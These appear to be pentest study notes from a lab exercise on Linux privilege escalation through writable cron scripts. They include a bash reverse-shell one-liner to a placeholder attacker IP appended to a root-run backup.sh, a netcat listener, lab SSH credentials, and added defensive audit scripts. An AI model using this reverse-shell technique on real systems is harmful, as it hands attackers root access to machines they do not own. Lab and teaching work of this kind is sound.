# Intro

- Cron jobs are set to run according to a deterministic frequency but can also be set to run one time, e.g., on boot
- Cron jobs are typically used for admin tasks such as running backups, cleaning up directories, or the like
- `crontab` can be used to create a cron file, which will be run by the cron daemon on the schedule specified
- When created, the cron file is placed in `/var/spool/cron` for the specific user that creates it
- Each entry in the crontab file requires six items in the following order: minute, hour, day of month, month, day of week, command
- For example, the entry `0 */12 * * * /home/admin/backup.sh` would run every 12 hrs
- The root crontab is almost always only editable by the root user or a user with full sudo privs but can still be abused
- For example, during pentesting, you may find a world-writable script that runs as root and, even if you cannot read the crontab to know the exact schedule, you may be able to ascertain how often it runs (e.g., a backup script that creates a `.tar.gz` file every 12 hours)
- In this case, you can append a command onto the end of the script (e.g., a revshell one-liner), and it will execute the next time the cron job runs
- Certain apps create cron files in the `/etc/cron.d` directory and may be misconfigured to allow a non-root user to edit them

# Enum

- Use `find` to identify writeable files or dirs

```bash
find / -path /proc -prune -o -type f -perm -o+w 2>/dev/null
```

- Peruse the found items, such as the directory `/dmz-backups/`
- A quick look in the `/dmz-backups` directory shows what appears to be files created every three minutes
- This is a major misconfig
- Confirm that the cron job is running with `pspy`
- `pspy` is a command-line tool used to view running processes without the need for root privileges
- It works by scanning [procfs](https://en.wikipedia.org/wiki/Procfs)
- We can use it to see commands run by other users, cron jobs, etc.
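The Intro makes the defensive point in passing: a root cron job is only as trustworthy as the script it calls, and a script that is world-writable (or sits in a world-writable directory) hands its privileges to whoever can edit it. The audit script below is an added example, not part of these notes or of the HTB module; its function names (`cron_commands`, `world_writable`, `audit_cron_file`) are this example's own. It assumes the two usual crontab layouts, user crontabs (five schedule fields then the command) and system crontabs such as `/etc/crontab` and `/etc/cron.d/*` (five schedule fields, a user column, then the command), and it reads the "other" write bit from the mode string printed by `ls -ldL`, which is portable but is a heuristic (ACLs are not considered).

```sh
#!/bin/sh
# Added example: audit a crontab for commands whose script, or the directory
# holding it, is writable by "other". Not part of the original notes or the HTB
# module; function names are this example's own. Assumes user crontabs
# (5 schedule fields + command) or system crontabs such as /etc/crontab and
# /etc/cron.d/* (5 schedule fields + user + command).

# Print the command portion of every active line in FILE.
# SYSTEM=1 means a user column sits between the schedule and the command.
cron_commands() {
    cc_file="$1"; cc_system="$2"
    set -f                                    # keep '*' schedule fields from glob-expanding
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line#"${line%%[![:space:]]*}"} # strip leading whitespace
        case "$line" in
            ''|'#'*) continue ;;              # blank line or comment
        esac
        if printf '%s\n' "$line" | grep -Eq '^[A-Za-z_][A-Za-z0-9_]*[[:space:]]*='; then
            continue                          # environment assignment, e.g. SHELL=/bin/sh
        fi
        set -- $line
        case "$1" in
            '@'*) skip=1 ;;                   # @reboot, @daily, ... use one schedule field
            *)    skip=5 ;;                   # minute hour day-of-month month day-of-week
        esac
        if [ "$cc_system" = 1 ]; then skip=$((skip + 1)); fi
        [ $# -gt "$skip" ] || continue        # too short to carry a command
        shift "$skip"
        printf '%s\n' "$*"
    done < "$cc_file"
    set +f
}

# True when the mode string from "ls -ldL" has the other-write bit (column 9).
# -L follows symlinks so a merged-/usr "/bin -> usr/bin" link is not misread.
world_writable() {
    [ "$(ls -ldL "$1" | cut -c9)" = "w" ]
}

# For every absolute path mentioned in a cron command that exists as a file,
# report it if it is world-writable, or if its directory is world-writable
# (a low-privileged user could replace the file there). One finding per line.
audit_cron_file() {
    cron_commands "$1" "$2" | while IFS= read -r cmd; do
        set -f; set -- $cmd; set +f
        for word; do
            case "$word" in /*) ;; *) continue ;; esac   # only absolute paths
            [ -f "$word" ] || continue
            if world_writable "$word"; then
                printf 'WORLD_WRITABLE_FILE %s\n' "$word"
            fi
            if world_writable "$(dirname "$word")"; then
                printf 'WORLD_WRITABLE_DIR %s\n' "$(dirname "$word")"
            fi
        done
    done
}

# Usage: sh cron_audit.sh /etc/crontab 1   (system layout; omit the 1 for a user crontab)
if [ $# -ge 1 ]; then audit_cron_file "$1" "$2"; fi
```

Running it over `/etc/crontab` and each file in `/etc/cron.d` (system layout) and over the files under `/var/spool/cron` (user layout) is the defender's counterpart to the `find` sweep in the Enum section: instead of listing every world-writable file on the box, it starts from what cron actually executes and flags only the scripts whose permissions let a non-root user change what root will run.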
```bash
./pspy -pf -i 1000
# the -pf flag tells the tool to print commands and file system events
# the -i 1000 tells it to scan procfs every 1000ms
```

- From the `pspy` output, we can see that a cron job runs the `backup.sh` script located in the `/dmz-backups` directory and creates a tarball of the `/var/www/html` directory

# Insert a revshell

- From here, we can look at `backup.sh` and append a revshell
- Note: When editing a script, ALWAYS take a copy of the script and/or create a backup of it
- Also note: We should APPEND our commands to the end of the script so that the script still runs properly before our revshell executes
- Let's look at `backup.sh`

```bash
cat /dmz-backups/backup.sh
#!/bin/bash
SRCDIR="/var/www/html"
DESTDIR="/dmz-backups/"
FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz
tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR
```

- We can see that the script is just taking in a source and destination directory as variables
- It then specifies a file name with the current date and time of the backup and creates a tarball of the source directory, the web root directory
- Let's modify `backup.sh` as below to add a [Bash one-liner reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)

```bash
#!/bin/bash
SRCDIR="/var/www/html"
DESTDIR="/dmz-backups/"
FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz
tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR
bash -i >& /dev/tcp/<kali_ip>/8443 0>&1
```

- Now simply open a listener on our Kali box and wait for the cron job to run

```bash
sudo nc -lvnp 8443
```

---

# Exercise

## initial enum

- `ping` test

![[images/Pasted image 20260207202140.png]]

- `nmap` scans

![[images/Pasted image 20260207202200.png]]
![[images/Pasted image 20260207202429.png]]

- `ssh` into target with given creds `htb-student:Academy_LLPE!`
- light internal enum

![[images/Pasted image 20260207202520.png]]

## cron job enum

- identify writeable
  files and dirs
- filter out `/proc`, `/sys`, `/var` dirs
- QUESTION: Would it have been better to pipe to `grep` and filter out `proc|sys|var`? This is because we still see `/proc`, `/sys`, `/var` in the output below

```bash
find / -path /proc -prune -o -path /sys -prune -o -path /var -prune -o -type f -perm -o+w 2>/dev/null
```

![[images/Pasted image 20260207203322.png]]

- navigate to `/dmz-backups`
- lots of `.tgz` files

![[images/Pasted image 20260207203425.png]]

- `cat` the script

![[images/Pasted image 20260207203450.png]]

- this script archives all webroot files and stores them here, and it appears that a cron job runs this script every 2 min
- start a listener on port 8443 on the Kali box

![[images/Pasted image 20260207203737.png]]

- append a revshell to `/dmz-backups/script.sh`

![[images/Pasted image 20260207203831.png]]

- then wait... up to 2 min for a revshell, else we have a problem
- revshell hit our listener!

![[images/Pasted image 20260207204325.png]]

- navigate to `/root-/cron_abuse` and `cat` flag

![[images/Pasted image 20260207204412.png]]
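On the QUESTION above, and on the `find` one-liner in the Enum section, which has the same shape: the pruned names show up because the expression contains no action, so `find` treats it as `( whole-expression ) -print`. `-prune` evaluates to true, so `/proc`, `/sys` and `/var` satisfy the expression and get printed themselves (their contents are still skipped). A `grep -v` on the output works, but giving the second branch its own `-print` is the cleaner fix and avoids accidentally filtering real hits whose path merely contains `var`. The function below is an added example, not part of these notes or of the HTB module; `find_world_writable` and `find_world_writable_noisy` are this example's own names, and it uses the octal `-perm -0002` spelling of the page's `-perm -o+w` so it also runs on non-GNU `find`. It generalises the two-line command above to any number of excluded trees.

```sh
#!/bin/sh
# Added example (not from the original notes): list world-writable regular files
# under ROOT while leaving whole directory trees out of the walk.
#   usage: find_world_writable ROOT [DIR_TO_SKIP ...]
find_world_writable() {
    fww_root="$1"; shift
    if [ $# -eq 0 ]; then
        find "$fww_root" -type f -perm -0002 -print 2>/dev/null
        return 0
    fi
    # Rotate the remaining args into:
    #   ( -path D1 -o -path D2 ... ) -prune -o -type f -perm -0002 -print
    # The explicit -print on the second branch is what keeps the pruned
    # directory names themselves out of the output.
    n=$#
    set -- "$@" '('
    while [ "$n" -gt 0 ]; do
        d="$1"; shift
        set -- "$@" -path "$d"
        if [ "$n" -gt 1 ]; then set -- "$@" -o; fi
        n=$((n - 1))
    done
    set -- "$@" ')' -prune -o -type f -perm -0002 -print
    find "$fww_root" "$@" 2>/dev/null
}

# The shape used in the exercise, for contrast: with no action in the
# expression, find behaves as if it were "( ... ) -print", and because -prune
# returns true the pruned directory's own name is printed (not its contents).
find_world_writable_noisy() {
    find "$1" -path "$2" -prune -o -type f -perm -0002 2>/dev/null
}

# Usage on a live box (the excluded pseudo-filesystems are the noisy ones):
#   find_world_writable / /proc /sys /dev
if [ $# -ge 1 ]; then find_world_writable "$@"; fi
```

Note that excluding `/var` wholesale, as the exercise command does, also hides `/var/spool/cron` and anything under `/var/www`, which on this very target is the directory the cron job archives; on a real engagement or audit it is usually better to exclude only the pseudo-filesystems (`/proc`, `/sys`, `/dev`) and let `find` walk the rest.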